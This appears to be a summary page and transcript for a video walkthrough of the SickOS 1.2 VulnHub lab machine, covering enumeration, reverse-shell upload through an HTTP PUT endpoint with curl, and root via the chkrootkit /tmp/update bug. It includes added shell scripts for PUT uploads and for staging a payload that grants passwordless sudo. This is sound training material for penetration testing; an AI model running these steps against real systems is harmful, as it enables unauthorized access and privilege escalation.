SickOS 1.2: Vuln Hub OSCP like Box Complete Walkthrough
Summary
TL;DR: In this tutorial video, HackRich walks through the SickOS 1.2 VulnHub box. After locating the target with netdiscover and enumerating it with nmap (SSH on port 22, lighttpd 1.4.28 on port 80), the host finds an endpoint that accepts the HTTP PUT method, uploads a PHP reverse shell with curl, and gets a shell as www-data; the callback only works once the listener is moved to port 443, because the target blocks outbound connections to arbitrary ports. For privilege escalation, linpeas.sh is run on the box. A kernel exploit will not execute on the target, but linpeas also lists a root cron job that runs a vulnerable chkrootkit, which executes a non-root-owned /tmp/update as root. Dropping an executable /tmp/update that grants www-data passwordless sudo yields root, and the video closes on why it pays to read the whole enumeration output rather than chase the first suggested exploit.
Takeaways
- 💻 The video is a walkthrough of hacking the sickOS vulnhub box.
- 🔍 netdiscover is used to find the IP address of the sickOS box on the local network, cross-checked against the VM's MAC address.
- 🛠️ Nmap is used to find open ports and service versions on the sickOS box: SSH on 22 and lighttpd 1.4.28 on 80.
- 🚫 searchsploit turns up no exploit for lighttpd 1.4.28 (its only hits are for 1.4.15).
- 🌐 The HTTP service at the sickOS IP address serves a page with a conspiracy theory about antivirus companies, with nothing useful in its source.
- 🔑 Feroxbuster is used to brute force directories and file extensions on the sickOS HTTP server.
- 📚 The PUT HTTP method is found to be allowed on a specific endpoint, which is unusual and is the upload vector.
- 💡 The presenter shows how to list an endpoint's allowed methods with curl -X OPTIONS -v.
- 📎 A first attempt to upload a PHP reverse shell with PUT fails with HTTP 417 Expectation Failed.
- 🔄 After fixing the curl invocation, shell.php uploads; the callback only arrives once the listener is moved to port 443, giving a shell as www-data.
- 🔄 linpeas.sh is transferred to the box (again over port 443) and run to look for privilege escalation vectors.
- 🔍 linpeas flags the kernel version as a likely escalation vector.
- 🛠️ A kernel exploit is compiled on Kali and transferred to the sickOS machine, but it will not execute there.
- 🕵️♂️ linpeas also lists further kernel exploits and CVEs that could be tried.
- 🔄 The presenter instead notices a root cron job running chkrootkit, whose vulnerable version executes a non-root-owned /tmp/update as root, and uses it to grant www-data passwordless sudo.
- 🎉 The video ends with root access and the point that digging past a tool's first suggestion is part of the process.
Q & A
What is the purpose of the video?
-The video is a walkthrough of the sickOS vulnhub box, demonstrating the process of hacking into the system and gaining root access.
What tool is used initially to find the IP address of the sickOS box?
-netdiscover is used to find the IP address of the sickOS box; the host confirms the hit against the VM's MAC address.
What command is used to run a vulnerability scan on the sickOS box?
-'sudo nmap -sC -sV -O -p- <target IP>': -sC runs the default NSE script set, -sV fingerprints service versions, -O attempts OS detection and -p- scans all 65535 TCP ports. It is a service and version scan rather than a dedicated vulnerability scan; the version banners it returns are what get checked against searchsploit.
Which ports were found open during the nmap scan?
-Two ports were found open: port 22 (SSH) and port 80 (HTTP, served by lighttpd 1.4.28).
What is the significance of checking for vulnerabilities in the light HTTP version?
-The lighttpd version banner (1.4.28) is checked against searchsploit to see whether a known exploit exists for the web server itself. The only hits (denial of service, code execution) apply to 1.4.15, so the web server version is not the way in and the host moves on to the web content.
What method is used to brute force directories on the sickOS box?
-Feroxbuster is used to brute force directories with the '-u' flag for URL, '-w' for wordlist, and '-x' to specify file extensions.
Why is the PUT HTTP method significant in this context?
-PUT creates or replaces the resource at the request URL. A web server that accepts PUT from an unauthenticated client lets an attacker write arbitrary files into the web root, so uploading a PHP reverse shell and then requesting it gives code execution as the web server user.
What error occurred when attempting to upload the reverse shell and how was it resolved?
-An HTTP 417 'Expectation Failed' occurred. curl adds an 'Expect: 100-continue' header to larger request bodies, and a server that does not implement that expectation answers 417. The host searched the error and added a curl flag that makes the upload succeed; the standard fix is -H 'Expect:', which sends the request without the header.
What is the role of linpeas.sh in the process?
-Linpeas.sh is a script that helps in looking for possible privilege escalation vectors by analyzing the system for known vulnerabilities and misconfigurations.
How is the final privilege escalation achieved?
-The final privilege escalation exploits chkrootkit's handling of /tmp/update: a root cron job runs a vulnerable chkrootkit, which executes a non-root-owned executable named update in /tmp with root privileges. The presenter puts a command in that file that appends a passwordless sudo entry for www-data to /etc/sudoers, waits for the cron job, and then uses sudo su to become root.
What is the significance of the final step where the user becomes root?
-The significance of becoming root is that it demonstrates successful privilege escalation, giving the attacker full control over the system, which is the ultimate goal in a penetration test.
Outlines
🔍 Initial Reconnaissance and Nmap Scan
The script begins with the host, HackRich, introducing a walkthrough of the sickOS vulnhub box. The first step is to discover the IP address of the sickOS box with netdiscover, cross-checked against the VM's MAC address; the Kali box's own IP address is noted for later. An nmap scan (-sC -sV -O -p-) finds two open ports: 22 running SSH and 80 running lighttpd 1.4.28. A searchsploit check finds nothing for that lighttpd version (the only hits are for 1.4.15). The host then visits the website, finds nothing in the page source, and brute forces directories with feroxbuster using several wordlists and the txt, php and html extensions, but beyond a lighttpd version disclosure nothing of interest turns up.
📚 Exploring HTTP Methods and Uploading a Shell
In this section the host looks at which HTTP methods a particular endpoint accepts, using curl -X OPTIONS -v, and finds that PUT is allowed. The host explains the usual roles of GET (retrieve a resource), PUT (create or replace a resource) and DELETE, which is why a writable PUT endpoint matters: it lets any client drop files into the web root. An attempt to upload a PHP reverse shell with curl -X PUT fails with HTTP 417 Expectation Failed; curl sends an Expect: 100-continue header on larger bodies and this server does not implement it. After looking up the error the host adjusts the curl command and shell.php uploads successfully. A netcat listener on port 1337 receives nothing when shell.php is requested, which the host attributes to egress filtering on the target (outbound connections to arbitrary ports being blocked). Re-uploading the shell with the callback port set to 443, the default HTTPS port, and listening there works, and a shell as www-data is obtained. The same restriction shows up again later, when the Python HTTP server used for file transfer has to be run on 443 rather than 8000.
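The method probe and the PUT upload described above, as an added example (not code from the video): it parses the Allow header out of an OPTIONS response, uploads a file with curl while suppressing the Expect: 100-continue header that causes the 417, and checks that the uploaded resource is reachable. The target URL and file name are supplied by the caller; the sample OPTIONS response at the bottom is constructed for offline testing and is not a capture from the box.

```shell
#!/bin/sh
# Added example, not from the video. Assumes: curl is installed, the caller
# supplies the target URL (for instance http://<target>/<endpoint>/shell.php)
# and the local file; the sample response below is constructed, not captured.

# Report whether METHOD appears in the Allow header of a raw HTTP response.
# Pure text processing, so it also works on a response saved to a file.
# Usage: allow_has_method "$raw_response" PUT   -> exit 0 if listed
allow_has_method() {
    raw="$1"; method="$2"
    printf '%s\n' "$raw" \
        | tr -d '\r' \
        | awk -F': *' 'tolower($1)=="allow" {print $2}' \
        | tr ',' '\n' | tr -d ' ' \
        | grep -qix "$method"
}

# Ask the server which methods it accepts for a URL and print them.
# Needs network access; not exercised by the offline test.
probe_methods() {
    curl -s -i -X OPTIONS "$1" | tr -d '\r' \
        | awk -F': *' 'tolower($1)=="allow" {print $2}'
}

# Upload a local file with PUT and print the HTTP status code.
# curl adds "Expect: 100-continue" to larger bodies; servers that do not
# implement it (lighttpd 1.4 among them) answer 417 Expectation Failed.
# An empty Expect header suppresses that. -T (--upload-file) implies PUT.
put_file() {
    url="$1"; file="$2"
    curl -s -o /dev/null -w '%{http_code}' -H 'Expect:' -T "$file" "$url"
}

# After the upload, a GET on the new resource should not be a 404.
uploaded_ok() {
    code=$(curl -s -o /dev/null -w '%{http_code}' "$1")
    [ "$code" != "404" ]
}

# Constructed sample OPTIONS response for offline testing (not from the box).
SAMPLE_OPTIONS_RESPONSE=$(printf 'HTTP/1.1 200 OK\r\nAllow: GET, HEAD, PUT, DELETE\r\nContent-Length: 0\r\n')
```

On a live target the sequence is `probe_methods URL` to confirm PUT is listed, `put_file URL shell.php` expecting a 2xx code, then `uploaded_ok URL` before starting the listener. If the PUT still returns 417 with the Expect header suppressed, the server is rejecting something else about the request and the verbose (-v) output is the next thing to read.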
🚀 Privilege Escalation and Linpeas Analysis
After gaining initial access the host upgrades the shell with a Python one-liner, sets TERM=xterm and changes the prompt colour for readability. linpeas.sh is served from Kali with a Python HTTP server (on port 443, since the first attempt on port 8000 is blocked by the same egress filtering seen earlier), fetched with wget, made executable and run. linpeas highlights the kernel version as a probable privilege escalation vector, so the host searches for an exploit: the one found applies to kernels below 3.13.2, and the target runs 3.11, which is in range. The exploit is compiled on Kali; compiling it needs an extra header include and an extra compiler flag found by searching the error messages. The binary is transferred and made executable, but running it fails with 'cannot execute binary file'. That message usually means the binary was built for a different architecture than the target, so checking uname -m on the box and compiling for that architecture (for a 32-bit target, gcc -m32) is the first thing to try. The dirtycow exploit suggested by linpeas fails the same way, so the host goes back through the linpeas output for other vectors.
🔧 Exploiting chkrootkit Vulnerability for Root Access
Reading further down the linpeas output, the host finds the cron jobs on the machine, among them one that runs chkrootkit, a tool that scans the system for rootkit signatures. linpeas also flags chkrootkit itself, and searchsploit confirms that this version has a local privilege escalation bug (CVE-2014-0476, affecting chkrootkit 0.49 and earlier): when chkrootkit runs, it executes a file named update in /tmp if one exists, with chkrootkit's own privileges. Because the cron job runs chkrootkit as root (the script is root-owned), any user who can write to /tmp can get code run as root. Following the exploit write-up, the host creates /tmp/update containing a command that appends a passwordless sudo entry for www-data to /etc/sudoers, marks it executable, and waits for the cron job to fire. Two practical caveats: the file must be executable or chkrootkit will not run it, and appending straight to /etc/sudoers with echo risks leaving sudo unusable for everyone if the line is malformed, so a drop-in under /etc/sudoers.d validated with visudo -c is the safer way to achieve the same result.
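The checks and the payload from this section, as an added example (not the video's own commands): it decides whether a chkrootkit version is in the affected range, locates the cron entry that runs it, and stages the /tmp/update file. It goes slightly beyond the video in one respect: the payload writes a sudoers drop-in and validates it with visudo rather than appending raw text to /etc/sudoers. Assumptions: `chkrootkit -V` prints "chkrootkit version X.Y", the target's sudo reads /etc/sudoers.d (Ubuntu does), and the path and user name are supplied by the caller.

```shell
#!/bin/sh
# Added example, not from the video. Assumes chkrootkit -V output of the form
# "chkrootkit version 0.49" and a sudo that includes /etc/sudoers.d.

# Exit 0 if dotted version $1 <= $2 (numeric, component by component).
version_le() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".");
        n = (na > nb) ? na : nb;
        for (i = 1; i <= n; i++) {
            p = (i in x) ? x[i] + 0 : 0; q = (i in y) ? y[i] + 0 : 0;
            if (p < q) exit 0; if (p > q) exit 1;
        }
        exit 0 }'
}

# chkrootkit 0.49 and earlier execute /tmp/update when run; 0.50 fixed it.
chkrootkit_vulnerable() {   # $1 = version string, e.g. "0.49"
    version_le "$1" "0.49"
}

# Pull the version number out of "chkrootkit version 0.49" style output.
parse_chkrootkit_version() {
    printf '%s\n' "$1" | sed -n 's/.*chkrootkit version \([0-9][0-9.]*\).*/\1/p' | head -n1
}

# List the cron files that mention chkrootkit (these run as root on a
# default install, which is what turns the bug into a root shell).
find_chkrootkit_cron() {
    grep -rl chkrootkit /etc/crontab /etc/cron.d /etc/cron.daily \
        /etc/cron.hourly /etc/cron.weekly 2>/dev/null
}

# Stage the payload: an executable file named update, owned by the current
# (non-root) user. When root's cron job runs chkrootkit, this script runs as
# root. It writes a sudoers drop-in and removes it again if visudo rejects
# it, so a typo cannot lock everyone out of sudo.
stage_update_payload() {   # $1 = path (normally /tmp/update), $2 = user
    path="$1"; user="$2"
    cat > "$path" <<EOF
#!/bin/sh
echo '$user ALL=(ALL) NOPASSWD: ALL' > /etc/sudoers.d/$user
chmod 0440 /etc/sudoers.d/$user
visudo -c -f /etc/sudoers.d/$user >/dev/null 2>&1 || rm -f /etc/sudoers.d/$user
EOF
    chmod 755 "$path"
}
```

On the box the sequence is `v=$(parse_chkrootkit_version "$(chkrootkit -V 2>&1)")`, `chkrootkit_vulnerable "$v" && find_chkrootkit_cron`, then `stage_update_payload /tmp/update www-data` and `sudo -l` once the cron job has run. The test below stages the file in a temporary directory rather than /tmp/update.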
🎉 Gaining Root Access and Conclusion
The final part describes the result: once the cron job has run, www-data has passwordless sudo, which the host verifies with sudo -l, and sudo su then gives a root shell (confirmed with id). The host reflects that this escalation was not straightforward: linpeas did list the chkrootkit issue, but it only reads as the vector if you know what chkrootkit is and keep reading past the kernel exploit suggestions. The video ends with a prompt for viewers to like, subscribe and stay tuned.
Keywords
💡sickOS vulnhub box
💡netdiscover
💡nmap
💡SSH server
💡HTTP service
💡searchsploit
💡feroxbuster
💡reverse shell
💡linpeas.sh
💡privilege escalation
💡cron job
💡chkrootkit
Highlights
Introduction to the walkthrough of the sickOS vulnhub box.
Using netdiscover to find the IP address of the sickOS box.
Running nmap to scan open services and version information.
Identification of open ports 22 (SSH) and 80 (HTTP) on sickOS.
Checking lighttpd 1.4.28 against searchsploit (no matching exploit).
Visiting the HTTP website to gather initial information.
Using feroxbuster for directory brute forcing.
Discovery of the PUT HTTP method allowed on a particular endpoint.
Attempting to upload a reverse shell using the PUT method.
Encountering and resolving a 417 Expectation Failed error.
Successfully uploading the shell.php to the server.
Setting up a listener and executing the PHP script for a shell.
Gaining initial access to the server as the www-data user.
Upgrading the shell with a Python script for better interaction.
Transferring linpeas.sh for privilege escalation analysis.
Analyzing the system with linpeas.sh for potential exploits.
Finding a potential privilege escalation vector in the kernel version.
Compiling a kernel exploit that then fails to execute on the target.
Spotting the root cron job running a vulnerable chkrootkit.
Successfully gaining root access through the chkrootkit /tmp/update bug.
Conclusion emphasizing the learning aspect of the process.
Transcripts
hi there this is HackRich welcome back to my channel so this video is going to be a
walkthrough of sickOS vulnhub box and without wasting any time let's get started
so let's first find out the IP address of sickOS box using netdiscover tool so first let me
find out the IP address of this Kali box sorry, ifconfig so this is the IP address clear
sudo netdiscover IP addresses this hit enter
yeah this is the IP address of sickOS box you can cross verify it using this Mac address
so copy this IP address
so let's run the nmap scan to find out what are the services open on this box sudo nmap -sC to
run the vulnerability scanning script -sV to find out the version information of the service -O to
find out the OS information -p- to scan all the ports and IP address of sickOS box 192.168.29.98
hit enter
so looking into nmap result there are two ports open one is port 22 which is
SSH server and another one is port 80 which is HTTP service and we also have the version
information of lighttpd we can definitely look into searchsploit to check whether this
particular version has any vulnerability or not so let's check that right now searchsploit no result
okay denial of service, code execution but it is 1.4.15 ours is 1.4.28 okay nothing interesting and
this is Linux box let's visit this HTTP website copy this IP address paste it here hit enter
what if computer viruses are really made by the antivirus software companies to make money
so let's look into the page source okay nothing in here okay fine so let's brute force the directory
copy the URL so let's use feroxbuster
-u URL -w specify the word list
-x to specify the extension file extension txt and PHP,HTML hit enter
okay so this is index.php I think this is home page only copy this
yeah this is home page
and copy this
parent directory okay
nothing interesting
here there is a disclosure of version of lighttpd
other than that nothing interesting
so let's use different word list let's use small.txt
no same thing let's use Big.txt
okay nothing interesting so after doing little bit research on this website for this particular
endpoint PUT HTTP method is allowed why is this important usually GET method is used to retrieve
the data from the server and PUT method is used to create a new resource or update the existing
resource in the server and DELETE method is used to delete the resource from the server
and you can use the OPTIONS method find out what are the HTTP methods are allowed for
particular endpoint I will show you how to find out that copy this URL so let's use Curl curl -X
to specify the HTTP method I will specify OPTIONS and the URL hit enter you have to specify verbose
and you can see here PUT method is allowed so let's PUT the reverse shell into this folder
so this is the reverse shell let me open this so here I have to change the IP address so ifconfig
so this is the ip address let's copy this
yeah this is the port number and Save
so clear
-X
upload file name is reverse shell
shell not reverse shell yeah hit enter
so we got some error 417 expectation failed so let's Google this error
so
so by adding this flag we can solve this error let's copy this
hit enter
I think we successfully uploaded this shell.php to the server so let's go to the server
let's refresh the page yes we have that shell.php here right let's set up the listener so
clear this and nc -lvp yes hit enter so now click on shell.php to execute this PHP script
so let's go back
I'm not sure why we didn't get a shell in my knowledge we should get a shell or there
might be a possibility that there is a firewall sitting up there and blocking the server from connecting
to a random port because this 1337 is a random port right so let's use a well-known port for
example let's use https default port which is 443 that might fix this issue let's see so I have to
modify the script so here I have to use 443 and save it and let's rename this to something else
443 hit enter and exit
443 hit enter so let's check whether it uploaded this script or not
yes we have that script here so let's listen to 443
click on this to execute this PHP file script
yeah we got a shell so we successfully got an initial access to the server so if I say ID
so I am www-data right so the next step is to root this box or get the root access
right so before that let's upgrade this shell using this python code hit enter
and clear you know let's set the term environment
export
term equal to xterm
clear yeah so let's change this command line color because this white is kind of confusing
so hit enter yeah so now clear this so now let's transfer the linpeas.sh to this machine
linpeas.sh is present in my Kali box I don't know whether you are aware of linpeas or not linpeas is a shell
script which will look for possible privilege escalation vectors so let's go to /tmp folder
and so let's go to desktop
yeah this is the file I want to transfer so I will set up simple python server so what was the IP
address of this kali box I forgot just ifconfig so this is the IP address right okay so wget
http IP address of Kali box
and 8000 linpeas.sh
why it is not working yeah I think same reason uh
firewall is blocking this machine to connect to random port so let's Ctrl C
so let's Host this simple python server with the port number 443
http IP address of Kali box 443 file name then linpeas.sh
yes that was the reason so if I say ls -al so we have linpeas.sh in this machine so let's
make it as executable chmod +x linpeas.sh so let's run the script clear linpeas.sh
so if you look at here this particular Linux version is marked in a yellow
color right so that means there is a 95% chance that there is a privilege
escalation Vector so let's search in the Google to check whether is there
any exploit exist for this particular Linux version so let's copy this version
privilege escalation
so let's go to this
so this is less than 3.13.2 server is 3.11 that's fine
so let's copy the exploit
so so let's save this file in the local machine exploit.c
paste the code Ctrl X
so let's set up the simple HTTP server using python
so let's download this file
yes so there is an instruction to compile this source code
yeah here GCC source code.c and yeah this is simple right so GCC exploit.c -o exploit
okay we are getting another so let's try this let's compile this binary in this local machine
only after compiling the binary let's transfer that binary file to sickOS machine Ctrl C so GCC
exploit.c -o exploit okay we are getting some error
time is defined in the header okay we need to include this header that's
okay and compile again we are getting some error let's copy this error let's search in the Google
by compiling this flag so let's copy this
yeah we successfully compiled the binary file so let's transfer this binary file to sickOS machine
so let's set up the simple HTTP server
so same thing wget so what is IP address this is right
so let's make it as executable
and let's run the binary file
okay still we got an error cannot execute the binary file okay that's fine let's
go through the result generated by this linpeas so let's go up
yeah so so if you look at here so these are the exploits suggested by the linpeas
you can try all of this I have tried this dirtycow but I got the same error as we get
for previous exploit we tried right so let's go down you can definitely try all of this exploit
so here also some of the CVE suggested by the linpeas you can try all of this
so here linpeas listed all the weird or unexpected processes run by the root user
so here linpeas listed all the cron jobs present in this machine so if you don't know what is
a cron job using a cron job we can execute a script or job on a given schedule that means if I want to
run a particular script daily or weekly I can specify it in the cronjob and it will run automatically
if you look at here chkrootkit is also present in this cron job so chkrootkit
is a security tool which searches for rootkit signatures in the system so if you also go up
so if you look at here linpeas also suggested chkrootkit vulnerability because the problem
is some of the chkrootkit versions have some vulnerability so if I check in the searchsploit
so let's clear this out searchsploit so you can see here this version of chkrootkit
has the vulnerability of local privilege escalation so let's copy this file
yeah let's view that text file
so you can read about this exploit so we just followed a serious vulnerability in the chkrootkit
okay
so here they specify how to reproduce this bug so we have to put an executable file named update
with a non-root owner in the /tmp folder then run chkrootkit okay in our case
chkrootkit is present in cronjob so it will be run by the root user right so if you look at here
so the owner of the chkrootkit script is root so that means most probably this script is run
by root user so let's reproduce this vulnerability so let's clear this out
so let's create a update file in the temp directory touch
update so if I say ls -al update so we have the update file in this temp directory
so because this update file is executed by the root user so I will put the command in this update
file which will give the sudo access to this www-data user without using password so equal
www-data
ALL
NOPASSWD
/etc/sudoers
so this is the command responsible for giving the sudo access to www-data
so if I hit enter if I cat update file
okay we have the command in this update file so let's make this update file executable
if I say ls -l update yeah it is executable
okay let's wait for some time so now what happens is cronjob will run that vulnerable chk rootkit
when it is ran this update file will be executed by the root user so that means it will execute
this Command right so this will give the sudo access to www data user so let's wait for some time
sudo -l yeah you can see here this www-data has a sudo access so if I say ID
so I am www-data user so now I will say sudo su
so now I am root if I say id
I am root user so we successfully gained the root access I agree that this privilege escalation
process was not straightforward because if you don't know what chkrootkit is then you will not
end up with root access right but it is not that if you run the linpeas script you will get
the privilege escalation vector sometimes you have to dig deeper that is fine it's all about learning
so that is all for this video Until then stay tuned like the video and subscribe the channel
thank you